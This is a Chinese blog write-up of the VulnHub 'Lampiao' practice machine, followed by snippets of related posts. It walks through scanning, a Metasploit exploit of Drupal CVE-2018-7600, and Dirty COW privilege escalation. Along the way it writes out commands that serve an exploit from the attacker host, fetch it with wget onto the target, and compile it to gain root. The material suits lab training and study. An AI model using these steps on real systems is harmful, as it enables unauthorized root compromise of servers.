【脏牛漏洞】vulnhub-Lampiao

最新推荐文章于 2024-03-13 06:27:32 发布
最新推荐文章于 2024-03-13 06:27:32 发布
阅读量453 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_atopos/article/details/125143343
版权

靶场

https://www.vulnhub.com/entry/lampiao-1,249/

打开虚拟机后,显示需要登录
在这里插入图片描述

使用nmap扫描,靶场搭建在内网环境
扫描

扫描结果
扫描结果
再扫描开放端口
扫描端口
访问端口1898
1898端口

查看web指纹,发现CMS是Drupal 7
web指纹

drupal 7 漏洞getshell

搜索有关drupal 7 的漏洞,发现CVE-2018-7600可以实现远程代码执行

注册

  1. 用户填写表单->表单没有问题->返回注册成功页面
  2. 用户填写表单->表单内容有问题(例如用户名已被注册)->调用buildform方法,把用户传入的内容一同构造为表单数组->渲染表单数组为html页面返回

该漏洞是Form API在用户提交表单数据时可以在表单渲染过程中修改表单数据

想利用该漏洞,就需要在表单结构中的某个地方注入渲染数组,所以,首先要找到注入位置

使用msf进行漏洞利用

漏洞利用
设置
设置

执行
执行

获取shell
在这里插入图片描述
查看版本信息,时间2016.10.18,可能存在脏牛漏洞
版本信息

脏牛漏洞

kali搜索cow
cow

将脚本拷贝到root,方便一会获取

 cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /root/

在这里插入图片描述

使用python传输exp

python -m SimpleHTTPServer 8888

在这里插入图片描述

靶机获取文件

wget http://192.168.16.150:8888/40847.cpp

在这里插入图片描述

可以看到接收到的脚本文件
在这里插入图片描述
编译利用

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil 
#-Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告 
#-pedantic 允许发出ANSI/ISO C标准所列出的所有警告 
#-O2 编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高 
#-std=c++11 按C++2011标准来编译的 
#-pthread 在Linux中要用到多线程时,需要链接pthread库 
#-o 40847 gcc生成的目标文件,名字为40847

在这里插入图片描述

使用,得到root修改后的密码
在这里插入图片描述
ssh远程登录
ssh远程登录
查看flag
flag

参考

Lampiao靶机渗透测试

vulnhub–lampiao(脏牛提权)

ky0uma
关注
专栏目录
Vulnhub系列-Lampiao
Yasso的博客
01-06 3022
靶机:192.168.12.133 kali:192.168.12.128 一、信息搜集 nmap -p- -sV 192.168.12.133 访问80端口 一串乱码(没找到有用的信息) 访问1898端口 Drupal−CMS\color{red}{Drupal-CMS}Drupal−CMS http://192.168.12.133:1898/?q=node/2 audio.m4a qrc.png wget http://192.168.12.133:1898/audio.m4a wget http:
Vulnhub-Lampiao 靶机渗透
Majula
01-30 2329
WalkthroughDownloadDescriptionPen TestingInformation GatheringExploitationReview Download Lampião: 1 ~ VulnHub VM 镜像文件,直接选择 打开虚拟机 即可。 Description Would you like to keep hacking in your own lab? Try this brand new vulnerable machine! “Lampião 1”. Get root!
vulnhub靶场之lampiao
向阳-Y.的博客
02-28 4381
目录1.信息收集2.尝试爆破ssh登录【失败】3.尝试访问网站3.1扫描目录【失败】4.网站系统漏洞【get】5.提权阶段 1.信息收集 首先查看本机网卡网段并来一波存活主机探查,经过排除,锁定了192.168.86.132为靶机 nmap -sP 192.168.86.0/24 接着再对靶机进行一波端口扫描,扫描后的结果如下 nmap -sN -sV -p 1-65535 192.168.86.132 2.尝试爆破ssh登录【失败】 首先使用msfconsole进行ssh登录爆破一波 msfcon
Vulnhublampiao
qq_45589758的博客
05-15 358
上面得到的Drupal可以通过msf进行搜索,并对其进行利用,这里利用的是一个2018年的漏洞,渗透测试过程中可以多利用几个,注意站内使用的版本是哪一年的,择payload时,要用新的。我发现有的文章是在网站的网页信息中提取疑似可以利用的信息,组成一个字典,使用hydra进行爆破,本人没有尝试,但是这种字典肯定是抽取的关键字越多,越容易爆破出来。在页面存在的其他可点击链接随便点点看看,这里需要注意的是有连个URL是相似的,以node=1和以node=3结尾,这里应该测试node=2或者其他。
[Vulnhub] Lampiao
weixin_63231007的博客
07-03 633
下载链接:Lampião: 1 ~ VulnHub nmap 扫描一下 发现靶机ip:192.168.236.134nmap -A -p 1-65535 192.168.236.134扫一下靶机ip,看看开放了哪些服务: 访问80,没有信息,试试这个1898发现一个登录框,类似于博客 dirb 扫描一下目录 dirb http://192.168.236.134:1898 访问其中的,发现了是Drupal msf--Drupal漏洞利用 msfconsole 查找一下msf中Drupal可以利用的漏洞
VulnHub靶场之Lampiao
A_dmin的博客
10-16 1561
VulnHub靶场之Lampiao 最近事情有点多,但是还是要抽出点时间来学习的!!! 老样子,Lampiao虚拟机先启动,然后再启动kali!! Lampiao虚拟机启动如下,不知账户密码,估摸着和上次那个靶机是差不多的!!!..
VulnHub--Lampiao-linux脏牛漏洞提权
记录笔记
07-06 1089
vulnhub-靶场--lampiao
渗透测试实战Vulnhub-Lampiao
weixin_44558065的博客
06-22 1710
目录 一、设计概述 1.1、渗透测试的意义 1.2、渗透测试的目的 二、需求分析 2.1、用户需求分析 2.2、渗透测试 三、方案规划与实施 3.1、信息收集 3.1.1 Nmap扫描 3.1.2 wpscan扫描 3.1.4 webdirscan目录扫描 3.2 漏洞分析 3.2.1 漏洞名称 3.2.2 漏洞概述 3.2.3 漏洞点 3.2.4 漏洞触发流程 3.2.5 漏洞利用 3.2.6 修复意见 3.3 web渗透 一、设计概述 1.1、渗透测试的意义 信息安全等级保护的要求 2015年12月2
vulnhub-lampiao靶机练习
weixin_52451257的博客
11-10 1762
第一步:信息收集 Nmap –sS –p 1-65535 192.168.231.1-255 (靶机使用的是nat模式,和攻击机处于同一网段,所以扫描231.1-255整个网段的地址排除攻击机kali的ip就可以判断出靶机的ip) 我们可以可能到靶机开放了22(ssh),80(http),1898端口, 可以通过dirmap 扫描目录 Python3 dirmap.py –i http:192.168.231.139 –lcf 先访问80端口看一下网站长啥样,有没有可以利...
小白的靶机-VulnHub-Lampiao
wo41ge的博客
12-08 302
靶机地址,看这里 一、信息收集 我们在VM中需要确定攻击目标的IP地址,需要使用nmap获取目标IP地址: 关于nmap的入门操作 nmap -sP 192.168.86.0/24 或者使用netdiscover获取目标IP地址 我们就拿到了这次靶机的IP地址:192.168.86.160 开始探索机器。第一步是找出目标计算机上可用的开放端口和一些服务。因此我在目标计算机上启动了nmap全端口T5速度扫描: nmap -sS -sV -T5 -A -p- 192.168.86.160 目标计算机上
Vulnhublampiao渗透测试
Bird&Bird
04-02 1144
目录1、靶场概述2、信息收集1、靶场概述DescriptionBack to the TopWould you like to keep hacking in your own lab?Try this brand new vulnerable machine! "Lampião 1".Get root!Level: Easy链接:[靶场下载地址](https://www.vulnhub.com/entry/lampiao-1,249/)Kali IP 地址: 192.168.29.131靶场IP地址: 1
vulnhub打靶--lampiao
m0_52920608的博客
07-18 121
首先是信息搜集,查看到对应drupal版本信息其次利用drupal漏洞getshell最后利用脏牛漏洞提权。
【渗透测试】VulnHub-Lampiao
m0_52923241的博客
10-26 351
VulnHub-Lampiao渗透VulnHub-Lampiao详细解题步骤知识点总结Linux中查看进程状态信息命令:psCVE-2018-7600——Drupaldirtycow脏牛提权Python SimpleHTTPServer:linux远程下载文件到本地scpftpwgetGCC编译常用工具篇Dirb:Kali Linux下web网站目录爆破工具cewl:密码攻击工具wget:Linux下载文件的工具 VulnHub-Lampiao详细解题步骤 VulnHub-Lampiao详细解题步骤 nma
VulnHub - Lampiao
最新发布
qq_46081990的博客
03-13 461
得知系统为Ubuntu 14.04,内核版本为4.4.0,检测到[CVE-2016-5195] dirtycow,并给出了EXP下载地址,我这里用的EXP是另外从EXP监控项目里找的。DirSearch扫描网站目录,发现/CHANGELOG.txt等多个敏感文件和目录,其内容显示Drupal版本为7.54。上传dcow.cpp至目标主机/tmp目录下,c++编译为目标文件dcow,python切换为pty环境执行dcow。Wappalyzer显示CMS为Drupal 7,编程语言为PHP。
Vulnhub靶机 Lampiao
菜浪马废的博客
04-28 572
找到登录页面 cms:drupal7 可以爆破用户名 先找一下漏洞试试 伐克 尝试了半天 发现版本是7.54 用了半天7.0-7.31的 找到mysql的账号 三个账号 没能解密任何一个 试一下ssh 失败了 root就在你眼前 就是没法提权的感觉 太酸爽了 有一个用户tiago ssh爆破 我*********他 密码是这个?????? 我********* $...
vulnhub-lampiao
m0_45155797的博客
04-07 80
vulnhub lampiao drupal 脏牛提权
【甄选靶场】Vulnhub百个项目渗透——项目二:Lampiao(SSH爆破,脏牛提权)
人间体佐菲的博客
08-30 1986
【甄选靶场】Vulnhub百个项目渗透——项目二:Lampiao(SSH爆破,脏牛提权)
vulnhub lampiao靶机 Linux脏牛提权
weixin_51441054的博客
04-04 3316
首先我们打开靶机,发现需要登录 利用kali作为攻击机,先扫描其ip地址,kali ip为192.168.142.134,因为在同一局域网下,用nmap扫描 得到靶机ip为192.168.142.136,访问80端口 再进一步扫描端口 得到一个1898端口,貌似是主页 发现cms信息 利用msf进行漏洞利用 攻击成功,得到一个普通用户权限 上传一个探测Linux提权漏洞的探针 发现没有Perl,不能运行,换一个探针...
[VulnHub靶机]Lampiao_脏牛提权
qq_45927819的博客
03-16 3669
环境介绍 攻击机:kali(192.168.56.104) 受害机:lampiao(192.168.56.107) 实验步骤 1. 扫描端口 nmap -sS -Pn -A -p- -n 192.168.56.107 开放了22、80、1898端口 2. 信息收集 80端口没什么东西,我们访问1898端口,还是先扫描一下1898端口下的目录: 这些文件等会再看,1898端口: 经过测试并不能注册用户,需要通过邮箱验证码才能设置密码,所以行不通. 查看博客的详情页面: 下图是第一篇: 第二篇:
脏牛漏洞CVE-2016-5195的影响范围?
06-09
脏牛漏洞(CVE-2016-5195)是一个 Linux 内核本地提权漏洞,影响 Linux 2.6.22 版本至 4.6 版本的所有 Linux 系统。该漏洞可以被攻击者利用来提升其权限,从而获得对系统的完全控制。因此,该漏洞的影响范围非常广泛...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值